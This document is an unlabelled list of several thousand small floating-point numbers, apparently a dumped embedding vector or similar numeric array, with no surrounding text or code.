0.002513294341042638, 0.012275215238332748, 0.003940644674003124, -0.002629025373607874, -0.004363063722848892, -0.016125204041600227, -0.01893361285328865, -0.012969601899385452, 0.023825181648135185, 0.002895207144320011, -0.009443660266697407, -0.0028141953516751528, 0.02362458035349846, 0.001260504825040698, 0.002223966410383582, -0.03657103702425957, 0.013633126392960548, -0.007680688984692097, -0.01547710970044136, -0.0026637448463588953, 0.01472871471196413, 0.02603178843855858, -0.007117464207112789, 0.0029222110752016306, -0.015245647169649601, -0.00021723697136621922, -0.008456087671220303, -0.0035625898744910955, -0.04391610622406006, 0.004332202021032572, -0.019519982859492302, 0.00835578702390194, 0.0030880921985954046, -0.019149644300341606, -0.0105315325781703, -0.028006933629512787, -0.021541420370340347, 0.0177608709782362, -0.006006445270031691, 0.009065604768693447, -0.04845276474952698, -0.018270086497068405, 0.0026135945226997137, -0.0077887047082185745, -0.016495542600750923, 0.0003462289460003376, -0.05036618560552597, -0.0056746830232441425, 0.002000219654291868, -0.007630539126694202, -0.006183899939060211, 0.0002681104524526745, -0.012645554728806019, -0.00010668962931958959, 0.02873218059539795, -0.022035205736756325, 0.0021198084577918053, 0.02904079668223858, 0.03950289264321327, -0.0013569474685937166, -0.02975061535835266, -0.02794520929455757, -0.02572317235171795, 0.008988451212644577, -0.05468681454658508, -0.0030880921985954046, -0.013833727687597275, -0.007657542824745178, -0.0032983371056616306, 0.043669212609529495, -0.024920769035816193, 0.006878286600112915, 0.016865883022546768, -0.008718411438167095, -0.003867348423227668, -0.002198891481384635, -0.011349366046488285, -0.00022085357340984046, 0.009868007153272629, -0.007711550686508417, -0.0088804354891181, 0.008124325424432755, 0.015515686012804508, -0.003961862064898014, -0.03296022489666939, 0.009937446564435959, 0.003784407861530781, -0.03262074664235115, 0.00871069636195898, 0.009736845269799232, 0.004170178435742855, -0.018424395471811295, 0.016464682295918465, -0.008394364267587662, 0.019442830234766006, 0.027127375826239586, -0.029565446078777313, -0.012259784154593945, -0.039039965718984604, -0.004332202021032572, -0.009983738884329796, -0.03004380129277706, -0.0035510167945176363, 0.014705568552017212, -0.03462675213813782, 0.023547425866127014, -0.015793440863490105, -0.007804135791957378, 0.007985447533428669, 0.0007112642051652074, -0.019026197493076324, -0.013285933062434196, 0.01609434187412262, 0.028531581163406372, -0.013895451091229916, 0.014450959861278534, 0.015384524129331112, 0.015546548180282116, 0.00827091746032238, -0.027420561760663986, -0.010315501131117344, 0.017930610105395317, 0.010145762003958225, 0.019288521260023117, -0.0013010107213631272, -0.016464682295918465, -0.010153478011488914, -0.008826427161693573, 0.002000219654291868, 0.025229385122656822, 0.02933398261666298, -0.008726127445697784, 0.020106354728341103, -0.05024274066090584, -0.011403373442590237, 0.05215616151690483, -0.0042010401375591755, 0.008965305052697659, 0.025183092802762985, 0.005570524837821722, -0.004420929122716188, -0.00895758904516697, 0.033762626349925995, -0.013123909942805767, 0.006762555334717035, -0.0249516312032938, -0.02223580703139305, -0.027729177847504616, -0.021865468472242355, 0.01760656200349331, 0.014720999635756016, 0.018733011558651924, 0.034071244299411774, -0.0005810667062178254, -0.013833727687597275, 0.015284224413335323, 0.010045462287962437, -0.008702980354428291, -0.0030340843368321657, 0.0028604876715689898, 0.021279096603393555, -0.020708156749606133, 0.00008848609286360443, -0.010570109821856022, 0.01028463989496231, -0.0001410473050782457, 0.01518392376601696, 0.028469856828451157, 0.0033697045873850584, -0.00289134937338531, -0.016958467662334442, -0.0071097491309046745, 0.007044167723506689, 0.017791731283068657, -0.022312961518764496, 0.002607807982712984, 0.0011939594987779856, 0.04684796184301376, 0.02705022133886814, -0.01209776010364294, 0.017081914469599724, 0.004509656224399805, 0.01745225489139557, -0.004266621079295874, 0.015315085649490356, -0.031077666208148003, -0.04138544946908951, 0.01626408100128174, 0.03237385302782059, 0.008224625140428543, -0.014258074574172497, -0.010122615844011307, -0.0008993272786028683, 0.004131601192057133, 0.014605267904698849, 0.0015797298401594162, 0.02902536652982235, -0.028778472915291786, 0.0438852421939373, -0.017807163298130035, 0.030028369277715683, -0.002850843360647559, -0.027250822633504868, -0.015585125423967838, -0.013440241105854511, -0.021834606304764748, 0.01466699130833149, 0.016449250280857086, -0.014705568552017212, 0.0018304806435480714, -0.009759991429746151, -0.0224209763109684, -0.024380691349506378, -0.015145346522331238, -0.015754863619804382, -0.012830724008381367, 0.0103849396109581, 0.02959630638360977, -0.0029569303151220083, 0.010631833225488663, 0.0036127399653196335, -0.023809751495718956, 0.002262543421238661, -0.011773712933063507, 0.028068656101822853, -0.005971726030111313, -0.052711669355630875, -0.03879307210445404, 0.0075495271012187, -0.0007561100064776838, -0.017791731283068657, 0.038577042520046234, -0.01817750185728073, -0.011110188439488411, -0.030475864186882973, -0.02195805311203003, 0.017992332577705383, -0.010161193087697029, -0.016464682295918465, -0.025152232497930527, -0.0411694198846817, -0.008186048828065395, 0.0042473324574530125, -0.03937944397330284, -0.017189929261803627, 0.03518226370215416, -0.011341650038957596, -0.0009866078617051244, -0.011935736984014511, 0.012144053354859352, -0.011009887792170048, 0.016032619401812553, -0.01195888314396143, 0.004995726980268955, 0.004224186297506094, 0.0021506701596081257, 0.0027428276371210814, 0.009111897088587284, -0.02163400501012802, 0.024288106709718704, 0.012985032051801682, -0.002926068613305688, -0.005871425848454237, 0.026973068714141846, 0.014682422392070293, 0.004671679809689522, 0.010894156992435455, 0.016618989408016205, -0.0019182434771209955, 0.009297067299485207, -0.033145394176244736, -0.02283760905265808, -0.01714363694190979, -0.015762578696012497, 0.004648533649742603, -0.0008318174513988197, 0.002528725191950798, -0.008378933183848858, -0.02674160525202751, 0.016865883022546768, 0.01982859894633293, -0.004972580820322037, -0.006959298625588417, 0.013880020007491112, -0.023362256586551666, -0.003857704345136881, 0.006303488742560148, 0.017930610105395317, 0.028454426676034927, -0.0062687695026397705, -0.015353662893176079, 0.0007884182850830257, 0.02674160525202751, -0.026942206546664238, -0.002904851222410798, 0.023964058607816696, -0.004058304708451033, 0.014883022755384445, 0.007113606669008732, 0.0006804025615565479, 0.022806746885180473, 0.002376345917582512, -0.003996581770479679, -0.013471103273332119, 0.004625387489795685, -0.0024689307902008295, -0.003155602142214775, -0.017205361276865005, 0.019134212285280228, -0.008594964630901814, 0.014620698988437653, -0.009729130193591118, 0.010654979385435581, -0.0002360432845307514, 0.007939155213534832, 0.024303536862134933, 0.015531117096543312, 0.004386209882795811, 0.00612217653542757, 0.04123114421963692, -0.00014598999405279756, -0.004953292198479176, 0.00813204050064087, -0.0030263690277934074, -0.01668071374297142, -0.014412382617592812, 0.00006106022192398086, -0.018918180838227272, 0.027775470167398453, 0.0027254680171608925, 0.016125204041600227, -0.01833181083202362, -0.01323964074254036, 0.01640295796096325, -0.004690968431532383, 0.007117464207112789, 0.009297067299485207, 0.017205361276865005, 0.008124325424432755, 0.016927605494856834, -0.000981303513981402, -0.012136337347328663, 0.017020191997289658, -0.01925765909254551, -0.02663359045982361, 0.013440241105854511, 0.014558975584805012, 0.013501964509487152, -0.0037535461597144604, 0.0065773855894804, 0.014103766530752182, 0.032126959413290024, 0.018887320533394814, 0.013085332699120045, 0.007383645977824926, -0.03981150686740875, -0.015176208689808846, -0.021680297330021858, -0.015461678616702557, -0.0061877574771642685, 0.009381936863064766, -0.0017485044663771987, 0.02166486717760563, -0.022822178900241852, -0.03130912780761719, -0.020183509215712547, 0.00009776869410416111, 0.008024024777114391, -0.027096513658761978, -0.010871010832488537, 0.027636593207716942, 0.00278140464797616, 0.0023339111357927322, 0.03521312400698662, 0.013880020007491112, 0.002669531386345625, 0.011881728656589985, 0.00141963514033705, 0.015832018107175827, 0.01683502085506916, -0.004910857416689396, 0.016958467662334442, 0.021433405578136444, -0.003415997140109539, -0.01745225489139557, -0.03774377703666687, 0.020075492560863495, 0.010500671342015266, -0.009952876716852188, -0.007391361519694328, -0.00984486099332571, 0.000036346806155052036, 0.01073984894901514, 0.027883486822247505, -0.002607807982712984, 0.020538417622447014, -0.019134212285280228, -0.021556850522756577, 0.013363087549805641, -0.020075492560863495, 0.0029067802242934704, 0.011094757355749607, -0.006349781062453985, -0.022637007758021355, -0.008078033104538918, 0.029395706951618195, 0.013208779506385326, 0.009011597372591496, -0.007483946159482002, 0.020507555454969406, 0.01743682287633419, 0.0018497691489756107, -0.02993578463792801, -0.012745854444801807, -0.019952045753598213, 0.00006127119559096172, 0.005597529001533985, -0.01526879332959652, 0.03348487243056297, 0.013517395593225956, 0.015832018107175827, -0.01075527910143137, 0.008633541874587536, 0.0417557917535305, -0.025661448016762733, -0.01540767028927803, -0.023531995713710785, 0.0010888370452448726, -0.010114900767803192, 0.008849573321640491, -0.05175495892763138, -0.024164659902453423, 0.002681104466319084, -0.0543782003223896, 0.012660984881222248, 0.001549832639284432, 0.010315501131117344, -0.013555972836911678, 0.0027582584880292416, 0.0026251678355038166, 0.01865585707128048, 0.0007681653369218111, -0.01685045287013054, -0.009960592724382877, 0.0019384963670745492, -0.013833727687597275, -0.003965720068663359, -0.001252789399586618, -0.018717581406235695, -0.0018140854081138968, -0.023979488760232925, -0.006596674211323261, -0.011688844300806522, -0.011843152344226837, -0.0033697045873850584, 0.01293102465569973, 0.005620675161480904, 0.014312082901597023, -0.0036011668853461742, 0.03154059126973152, -0.014697853475809097, -0.010377224534749985, 0.003053372958675027, -0.01306990161538124, -0.038391873240470886, -0.0017436823109164834, 0.027636593207716942, -0.008695265278220177, -0.035089679062366486, 0.016125204041600227, 0.0057672676630318165, 0.005238762125372887, -0.03863876685500145, -0.0102383466437459, 0.017328808084130287, -0.033454012125730515, -0.017853455618023872, -0.013301364146173, -0.022806746885180473, 0.005485655274242163, 0.02016807720065117, 0.016618989408016205, 0.003713040379807353, 0.012645554728806019, -0.0150990542024374, -0.02269873209297657, -0.001960678258910775, -0.007348926737904549, -0.01503733079880476, 0.00586756831035018, -0.0003872170636896044, -0.016865883022546768, -0.027420561760663986, -0.0049995845183730125, 0.027621163055300713, -0.00732578057795763, 0.005250335671007633, 0.002669531386345625, -0.0016752080991864204, -0.00978313758969307, 0.02192719094455242, -0.013332226313650608, 0.015778010711073875, 0.03234299272298813, -0.008031739853322506, -0.006913005840033293, -0.01533051673322916, -0.0032578313257545233, 0.01637209765613079, -0.02572317235171795, 0.02646385133266449, -0.004220328293740749, 0.02856244146823883, -0.009505383670330048, -0.004108455032110214, -0.003713040379807353, -0.005771125666797161, 0.013085332699120045, -0.007761701010167599, 0.006762555334717035, -0.009142759256064892, 0.016171496361494064, -0.016634421423077583, -0.0061491806991398335, 0.007730839308351278, -0.009983738884329796, 0.0008486949373036623, -0.03836100921034813, -0.044564198702573776, 0.003867348423227668, -0.005400785710662603, -0.029534583911299706, -0.014142343774437904, -0.0016144491964951158, 0.00413545873016119, -0.021618574857711792, 0.04221871495246887, 0.017359668388962746, -0.011310788802802563, -0.02779090218245983, 0.010500671342015266, -0.018995335325598717, -0.0020291523542255163, 0.021171079948544502, -0.015461678616702557, 0.033886075019836426, 0.027127375826239586, -0.015623701736330986, 0.010469809174537659, -0.030105523765087128, 0.004598383326083422, -0.007186903152614832, -0.0357377715408802, 0.011781428940594196, 0.005477940198034048, 0.019612567499279976, -0.026679882779717445, -0.018069487065076828, -0.000045719822082901374, -0.00579427182674408, -0.0037554751615971327, 0.025954633951187134, -0.003867348423227668, -0.006789559498429298, 0.013571403920650482, 0.011573112569749355, -0.009628829546272755, -0.007873574271798134, -0.02314622513949871, 0.0034179259091615677, 0.006527235731482506, -0.0041200281120836735, 0.0025673022028058767, -0.006025733891874552, -0.008517811074852943, 0.0074955192394554615, 0.003140171291306615, 0.021911760792136192, -0.01848611794412136, 0.0002710037224460393, -0.01566227898001671, -0.015345947816967964, -0.014906168915331364, -0.02314622513949871, -0.02107849530875683, -0.0312628336250782, 0.005732548423111439, -0.00721004931256175, -0.002162243239581585, 0.011349366046488285, -0.012830724008381367, -0.01925765909254551, 0.010701271705329418, 0.0005502050626091659, -0.015453963540494442, -0.000966837105806917, 0.002684962237253785, 0.017529407516121864, 0.027636593207716942, 0.0016231290064752102, -0.0008458016673102975, -0.0008414617623202503, 0.026371266692876816, 0.0135945500805974, 0.007132895290851593, 0.00012236155453138053, 0.009667406789958477, 0.014697853475809097, -0.002223966410383582, 0.0073219225741922855, -0.024720169603824615, 0.017328808084130287, 0.0009576751035638154, 0.00285470113158226, 0.008085748180747032, -0.014628414064645767, -0.032250408083200455, -0.01013804692775011, 0.011449665762484074, 0.005435505416244268, 0.002162243239581585, 0.016912175342440605, -0.00034140681964345276, -0.013131625019013882, 0.009821714833378792, 0.011480527929961681, -0.004822130315005779, -0.0019944331143051386, 0.00341985491104424, -0.009675121866166592, 0.034657616168260574, 0.0014205996412783861, 0.006083599757403135, -0.01669614389538765, 0.016433820128440857, 0.02121737413108349, 0.02314622513949871, 0.006905290763825178, 0.02539912424981594, -0.0139803197234869, 0.023686304688453674, 0.016788728535175323, -0.022312961518764496, -0.021525990217924118, -0.003651316976174712, 0.03289850056171417, -0.015392240136861801, 0.018285518512129784, 0.004555948544293642, 0.01564684882760048, -0.004401640500873327, 0.000492821738589555, -0.015847448259592056, 0.02613980323076248, -0.016186926513910294, 0.006156895775347948, -0.0016240935074165463, -0.00004749798245029524, -0.002002148423343897, -0.0030842344276607037, -0.005393070634454489, 0.004617671947926283, 0.0048414189368486404, 0.022775886580348015, -0.004818272776901722, 0.008209194988012314, 0.005747979506850243, -0.022652439773082733, 0.003358131507411599, 0.011241350322961807, -0.006588958669453859, 0.0009311533649452031, 0.006299631204456091, -0.011218204163014889, 0.0031382422894239426, 0.014528114348649979, 0.0024477133993059397, 0.025923771783709526, -0.003861561883240938, 0.01742139272391796, 0.020353248342871666, -0.011866298504173756, -0.01030007004737854, -0.03475020080804825, -0.007341211196035147, 0.010415801778435707, -0.001054117688909173, -0.024473275989294052, 0.007916009053587914, -0.009266205132007599, -0.013108478859066963, -0.015816587954759598, 0.007017164025455713, -0.007514807861298323, -0.018223794177174568, -0.001662670518271625, 0.01595546491444111, 0.005481797736138105, 0.015816587954759598, -0.014659276232123375, -0.00002313115692231804, 0.006496374029666185, 0.01731337606906891, 0.0005029481835663319, -0.0038808505050837994, 0.00628034258261323, -0.013347656466066837, 0.0339786596596241, 0.012352368794381618, 0.018300948664546013, 0.02734340727329254, -0.0005241655744612217, -0.015207069925963879, 0.006056595593690872, 0.024010350927710533, 0.007460799999535084, 0.012522107921540737, -0.01556197926402092, -0.010516101494431496, 0.01681959070265293, -0.011889444664120674, -0.01881016604602337, 0.001194923883304, 0.0008265131618827581, -0.016418389976024628, -0.00047835533041507006, 0.019180504605174065, -0.004471078980714083, 0.002389847766608, -0.0017764727817848325, 0.004347632639110088, 0.007557242643088102, -0.01127221155911684, 0.0034102106001228094, 0.005234904587268829, 0.0003691340680234134, 0.0019963618833571672, -0.03459589183330536, 0.02706565335392952, -0.005771125666797161, 0.004490367602556944, 0.013795150443911552, 0.0024457843974232674, 0.0011968527687713504, -0.015754863619804382, -0.018995335325598717, 0.004436359740793705, 0.017930610105395317, 0.02342398092150688, -0.006291915662586689, 0.0025152231100946665, -0.011920305900275707, 0.02916424348950386, 0.019319383427500725, 0.003223111853003502, -0.005045877303928137, 0.007954586297273636, -0.01210547611117363, 0.016294943168759346, -0.013995750807225704, 0.019797738641500473, -0.0013366944622248411, -0.016048049554228783, 0.011156480759382248, 0.002575017511844635, 0.009744561277329922, 0.010508386418223381, 0.005227189045399427, -0.01369484979659319, -0.00841751042753458, -0.007256341632455587, 0.017498547211289406, -0.013772004283964634, 0.021464265882968903, -0.015075908042490482, 0.003973435144871473, 0.009983738884329796, -0.00018516980344429612, -0.02197348326444626, 0.0022586858831346035, -0.014736429788172245, -0.004015869926661253, -0.009682837873697281, 0.011488243006169796, -0.009721415117383003, 0.005697829183191061, -0.015847448259592056, 0.016480112448334694, 0.009088750928640366, 0.0003467111673671752, 0.004771979991346598, 0.0007435724837705493, -0.006245623342692852, -0.02377888932824135, -0.003882779274135828, -0.01458983775228262, -0.013509680517017841, -0.009667406789958477, -0.015191638842225075, -0.010925018228590488, 0.005585955921560526, -0.01510677020996809, -0.009297067299485207, 0.0054277898743748665, -0.03249730169773102, -0.01030778605490923, 0.009381936863064766, 0.004274336155503988, 0.018563272431492805, -0.0063150618225336075, 0.019581707194447517, 0.012090045027434826, 0.0025557291228324175, -0.0048414189368486404, 0.006974729243665934, 0.0036667478270828724, 0.016912175342440605, -0.009875723160803318, -0.0026463849935680628, 0.014528114348649979, 0.002079302677884698, 0.013332226313650608, -0.01119505800306797, 0.02044583298265934, 0.001988646574318409, 0.011218204163014889, -0.016480112448334694, 0.011071611195802689, 0.001380093744955957, -0.003165246220305562, -0.014790438115596771, 0.0007975803455337882, -0.005863710306584835, -0.015538833104074001, 0.004876138176769018, 0.026402126997709274, 0.019519982859492302, -0.01711277663707733, 0.014497252181172371, 0.00925077497959137, -0.0014437458012253046, -0.0038075540214776993, 0.0135945500805974, 0.004012012388557196, 0.011596258729696274, -0.007441511377692223, -0.01760656200349331, 0.005319774150848389, -0.015592840500175953, -0.00661982037127018, -0.0022664011921733618, 0.006261053960770369, -0.015160777606070042, -0.0075765312649309635, 0.010863294824957848, -0.009520813822746277, 0.004042874090373516, -0.013764288276433945, -0.000009222324479196686, -0.0013376589631661773, 0.004744976293295622, -0.000362141989171505, -0.003639743896201253, -0.0021969624795019627, -0.0012691847514361143, 0.017853455618023872, 0.0001528615248389542, -0.012522107921540737, 0.002872060751542449, 0.015816587954759598, 0.005994872190058231, 0.05156978964805603, -0.003188392613083124, 0.009466806426644325, -0.0007001733174547553, 0.011758282780647278, 0.0005820311489515007, -0.0011283784406259656, 0.00004641300256480463, -0.009651975706219673, 0.03249730169773102, -0.03064560331404209, -0.00706345634534955, -0.0009306711726821959, 0.0013424811186268926, -0.0014929315075278282, -0.007040310185402632, -0.009582537226378918, 0.01788431592285633, 0.018532410264015198, 0.004474936984479427, -0.015569694340229034, 0.008432941511273384, -0.0059678684920072556, 0.012660984881222248, 0.012444953434169292, 0.017020191997289658, -0.012807577848434448, -0.010161193087697029, 0.005123031325638294, 0.00796230137348175, 0.0055936709977686405, -0.007564958184957504, -0.0040737357921898365, 0.01669614389538765, 0.0322195440530777, 0.002517152111977339, 0.007657542824745178, 0.01158854365348816, 0.012545254081487656, 0.008540957234799862, -0.02661815844476223, 0.009320213459432125, 0.016202358528971672, 0.020507555454969406, -0.025028785690665245, 0.02959630638360977, 0.016279511153697968, -0.00016419353778474033, -0.01683502085506916, -0.025676880031824112, 0.010500671342015266, -0.003535585943609476, -0.00026208278723061085, -0.003277119714766741, 0.0017976901726797223, -0.0012248210841789842, -0.0004180787072982639, -0.013787435367703438, -0.00763439666479826, 0.008332640863955021, -0.006156895775347948, -0.029056228697299957, 0.014011181890964508, -0.004258905537426472, 0.006596674211323261, -0.00030451753991656005, -0.004093024414032698, 0.006025733891874552, -0.01316248718649149, -0.05814331769943237, -0.021525990217924118, 0.014466390945017338, -0.01338623370975256, -0.005859852768480778, -0.003749688621610403, -0.000927295652218163, 0.012375514954328537, -0.023084502667188644, -0.003741973079741001, -0.01850154995918274, -0.01714363694190979, -0.01774543896317482, -0.0012103547342121601, 0.0016424176283180714, -0.011156480759382248, -0.013563687913119793, 0.0020812314469367266, -0.012606977485120296, 0.009983738884329796, -0.007584246341139078, -0.00556280929595232, 0.007638254202902317, -0.0029144955333322287, 0.019057059660553932, -0.012059183791279793, 0.033886075019836426, -0.0013463387731462717, -0.03879307210445404, 0.005539663136005402, -0.010600971058011055, -0.01595546491444111, 0.002629025373607874, -0.011318503879010677, 0.020414970815181732, 0.004876138176769018, 0.02603178843855858, 0.01924222894012928, -0.010230631567537785, -0.000022588666979572736, -0.0034179259091615677, -0.007256341632455587, -0.03715740889310837, -0.043237149715423584, -0.008432941511273384, 0.04197182133793831, 0.013008179143071175, 0.006947725545614958, 0.0029164243023842573, -0.008772419765591621, 0.02975061535835266, 0.0009731058962643147, 0.009196766652166843, 0.0017899747472256422, 0.005655394401401281, 0.00536992447450757, 0.02240554615855217, 0.006970871705561876, 0.0062687695026397705, 0.01865585707128048, -0.005204042885452509, -0.0020272235851734877, -0.011056180112063885, 0.006006445270031691, -0.003317625727504492, 0.02027609385550022, 0.016063479706645012, 0.0012942597968503833, 0.0060218763537704945, 0.02104763500392437, -0.020677294582128525, 0.0057209753431379795, -0.0029106377623975277, 0.005620675161480904, -0.021757451817393303, -0.03925599902868271, -0.014535829424858093, 0.016480112448334694, 0.006284200120717287, 0.002264472423121333, 0.010122615844011307, 0.008602680638432503, -0.016727006062865257, 0.012198060750961304, 0.00827091746032238, 0.007584246341139078, 0.003572234185412526, -0.024689307436347008, -0.0059678684920072556, 0.015199354849755764, -0.004845276474952698, -0.027914347127079964, -0.003400566289201379, 0.021742021664977074, -0.011519105173647404, -0.0006895646220073104, 0.004486510064452887, -0.009011597372591496, -0.001409026444889605, -0.0036204555071890354, -0.010570109821856022, -0.01187401358038187, 0.004019727930426598, 0.002517152111977339, -0.00000672837859383435, 0.0044595059007406235, -0.021680297330021858, -0.008610395714640617, -0.005952437873929739, 0.013733427040278912, 0.010716702789068222, -0.006677686236798763, 0.0022027490194886923, 0.01127992756664753, -0.008996166288852692, 0.0012518250150606036, 0.0014099909458309412, -0.03672534599900246, -0.010053177364170551, 0.001021327218040824, -0.020816171541810036, -0.017838023602962494, 0.021356251090765, 0.01610977202653885, -0.0017803305527195334, 0.0065773855894804, 0.013486534357070923, 0.0006533986306749284, 0.0038422734942287207, -0.005639963783323765, -0.011534535326063633, 0.000051476239605108276, -0.0014292794512584805, -0.019782306626439095, -0.023578288033604622, -0.0115036740899086, 0.01435837522149086, -0.006920721381902695, 0.010801571421325207, 0.009405083023011684, 0.002301120664924383, -0.029256828129291534, -0.013309079222381115, 0.00006600291089853272, -0.003680249908939004, -0.03666362166404724, 0.004725687671452761, 0.003524012863636017, -0.02075444906949997, -0.004814414773136377, 0.011758282780647278, 0.021680297330021858, -0.004544375464320183, -0.028022363781929016, -0.014528114348649979, 0.0015401884447783232, 0.000843872781842947, -0.014998754486441612, 0.01881016604602337, 0.007703835144639015, -0.015793440863490105, 0.002177674090489745, -0.013926312327384949, -0.024318967014551163, 0.012151768431067467, -0.002648313995450735, 0.005501086357980967, 0.004822130315005779, -0.0005878176889382303, -0.008625826798379421, -0.01239094603806734, 0.009821714833378792, 0.022204944863915443, -0.018918180838227272, 0.011009887792170048, 0.001666528289206326, 0.006762555334717035, 0.020337816327810287, -0.008247771300375462, 0.0037284712307155132, -0.006886002141982317, 0.015423101373016834, -0.008556388318538666, -0.005065165460109711, 0.002474717330187559, 0.02060014009475708, 0.001933674211613834, -0.016480112448334694, -0.0015970895765349269, -0.01241409219801426, -0.013000463135540485, 0.00623790780082345, 0.0072756302542984486, 0.032096099108457565, -0.002958859084174037, -0.014003466814756393, 0.01518392376601696, 0.0012122835032641888, 0.017637424170970917, 0.036787066608667374, 0.024997923523187637, 0.0018198719481006265, 0.004806699696928263, -0.006264911498874426, 0.0011090899351984262, 0.0022741167340427637, -0.011928021907806396, -0.0018603778444230556, -0.00009366987796965986, 0.00018794252537190914, 0.01098674163222313, 0.013725711964070797, 0.006365212146192789, -0.008641257882118225, 0.01817750185728073, 0.010647263377904892, 0.01967429183423519, -0.0017909392481669784, -0.013417094945907593, 0.006747124716639519, 0.015353662893176079, -0.03169489651918411, 0.013918597251176834, -0.022667869925498962, 0.00732578057795763, -0.01090187206864357, 0.023794319480657578, 0.010122615844011307, 0.006600531749427319, 0.007649827282875776, 0.011033033952116966, 0.017174499109387398, -0.019211366772651672, -0.028763042762875557, 0.0015546547947451472, -0.00005717238309443928, 0.002495934721082449, 0.005910003092139959, 0.02464301511645317, -0.008726127445697784, 0.008008593693375587, 0.018408965319395065, -0.013131625019013882, -0.010485240258276463, 0.008579534478485584, 0.016449250280857086, -0.026957636699080467, 0.01263783872127533, -0.014381521381437778, -0.014913884922862053, -0.020414970815181732, -0.0033079814165830612, 0.0069824447855353355, -0.001423492911271751, -0.022143222391605377, 0.009412798099219799, 0.01803862489759922, -0.013555972836911678, 0.01685045287013054, -0.002594306133687496, -0.0011929949978366494, -0.01805405505001545, -0.005022731143981218, 0.009790853597223759, -0.035398293286561966, 0.0032481870148330927, -0.027544008567929268, 0.015230216085910797, 0.004424786660820246, 0.010462094098329544, -0.008849573321640491, -0.010037746280431747, -0.012012890540063381, -0.00389049481600523, -0.040089260786771774, -0.009667406789958477, -0.011758282780647278, -0.007298776414245367, -0.00931249838322401, 0.0004455648304428905, -0.0027447566390037537, -0.00285470113158226, -0.004370778799057007, -0.003103523049503565, 0.008309494704008102, -0.0037882656324654818, -0.011040749959647655, -0.02451956830918789, -0.01541538629680872, 0.0033041236456483603, -0.020816171541810036, -0.0121826296672225, -0.01210547611117363, 0.023531995713710785, 0.002966574626043439, 0.01956627517938614, -0.027868054807186127, 0.010940449312329292, -0.01526879332959652, 0.02147969789803028, -0.0007599677192047238, 0.018902750685811043, 0.0007107820129022002, 0.004351490177214146, 0.008224625140428543, 0.010793856345117092, -0.020060062408447266, -0.005882998928427696, -0.0009485130431130528, -0.0224209763109684, -0.006160753779113293, 0.001361769624054432, 0.00797001738101244, -0.005304343532770872, -0.01729794591665268, 0.02794520929455757, 0.02015264704823494, -0.0165109746158123, -0.020090924575924873, -0.0022953341249376535, -0.009675121866166592, -0.034040383994579315, -0.0016703859437257051, 0.005250335671007633, 0.004386209882795811, -0.010438947938382626, 0.009266205132007599, -0.0052079008892178535, -0.015986327081918716, -0.01173513662070036, -0.005335204768925905, -0.02134081907570362, 0.0013415166176855564, 0.003441072069108486, -0.01789974793791771, 0.003481578081846237, -0.012290645390748978, 0.004798984155058861, 0.023038210347294807, 0.0030591594986617565, -0.003919427283108234, -0.0135945500805974, 0.016618989408016205, 0.019195936620235443, 0.029874062165617943, 0.010708986781537533, 0.007464657537639141, -0.021850036457180977, 0.015893740579485893, 0.02013721689581871, 0.02347027324140072, -0.0011370583670213819, -0.004922430496662855, -0.004147032275795937, 0.019736014306545258, 0.006288058124482632, 0.020646432414650917, -0.004019727930426598, -0.028624165803194046, -0.0054740821942687035, 0.002594306133687496, 0.0012103547342121601, 0.009883438237011433, -0.005481797736138105, -0.009189051575958729, -0.016140634194016457, -0.018270086497068405, -0.0021680297795683146, 0.015253362245857716, 0.007746269926428795, 0.006330492440611124, -0.014682422392070293, 0.003973435144871473, -0.020106354728341103, 0.015307370573282242, -0.00442864466458559, -0.011557681486010551, -0.020399540662765503, 0.004980296362191439, 0.008664404042065144, 0.018439825624227524, -0.026865052059292793, -0.0038114117924124002, 0.0003245293628424406, 0.004984153900295496, -0.013494249433279037, 0.003903996665030718, 0.01269956212490797, -0.006033449433743954, 0.010724417865276337, -0.007206191308796406, -0.00011536946840351447, 0.007360499817878008, 0.004798984155058861, 0.03052215650677681, -0.011326219886541367, 0.0007218729006126523, -0.0003124740323983133, -0.015392240136861801, -0.022760454565286636, -0.003614668967202306, -0.009775422513484955, -0.00287591852247715, -0.0029067802242934704, -0.0019028126262128353, 0.011935736984014511, 0.000757074449211359, 0.004922430496662855, -0.007572673261165619, 0.005956295412033796, -0.01284615509212017, -0.008332640863955021, 0.003705324837937951, 0.020862463861703873, -0.009034743532538414, -0.017467685043811798, 0.0057286908850073814, 0.015623701736330986, 0.00444021774455905, 0.005713259801268578, -0.020492125302553177, 0.010045462287962437, -0.018547842279076576, -0.01896447315812111, 0.005666967481374741, -0.0051731811836361885, -0.00879556592553854, -0.00001943921233760193, -0.022004345431923866, -0.010585539974272251, 0.0024438556283712387, 0.01384144276380539, 0.018578704446554184, -0.004972580820322037, -0.0165109746158123, -0.007206191308796406, -0.0010126474080607295, 0.011773712933063507, 0.01802319474518299, 0.0007127108401618898, -0.015500255860388279, -0.010662694461643696, 0.0013289791531860828, -0.007009448483586311, 0.017467685043811798, -0.015423101373016834, 0.010778425261378288, -0.0056785405613482, -0.01096359547227621, -0.004598383326083422, -0.00043953716522082686, 0.01216719951480627, -0.013432526029646397, -0.005165466107428074, -0.005736406426876783, -0.021603142842650414, -0.019458260387182236, 0.00012585759395733476, -0.006079741753637791, 0.003090021200478077, -0.020538417622447014, -0.00011561057181097567, -0.011295357719063759, 0.038854796439409256, 0.031941790133714676, 0.026556435972452164, -0.010747564025223255, -0.006585101131349802, -0.009289352223277092, -0.004035158548504114, -0.015461678616702557, 0.0028315549716353416, 0.03774377703666687, -0.030599309131503105, -0.000021066682165837847, -0.007071171887218952, 0.005817417986690998, 0.018841028213500977, 0.017930610105395317, 0.0030707325786352158, 0.009173620492219925, -0.0014321727212518454, -0.01555426325649023, -0.005416216794401407, -0.012838440015912056, -0.0010801572352647781, -0.0070750294253230095, 0.005705544725060463, -0.006920721381902695, 0.005809702444821596, -0.003172961762174964, 0.01834724098443985, -0.004305197857320309, -0.0013135483022779226, 0.00881099607795477, -0.005902287550270557, 0.009073320776224136, 0.00005584629616350867, -0.004683252889662981, 0.006866713520139456, -0.01972058415412903, -0.0004614778736140579, -0.005910003092139959, 0.006905290763825178, 0.0015970895765349269, -0.0010878725443035364, -0.006261053960770369, -0.01791517809033394, 0.00939736794680357, -0.009952876716852188, 0.018902750685811043, 0.0053004855290055275, 0.017513977363705635, 0.00469482596963644, -0.014682422392070293, -0.0345650315284729, 0.00432448647916317, 0.01158854365348816, 0.002582733053714037, 0.012545254081487656, 0.004941719118505716, -0.004771979991346598, 0.008070317097008228, 0.028793904930353165, 0.0033041236456483603, 0.0075495271012187, 0.00751866539940238, 0.010323216207325459, -0.021772881969809532, 0.01879473589360714, -0.007098175585269928, -0.0031961079221218824, 0.0036783209070563316, 0.019766876474022865, 0.01908791996538639, 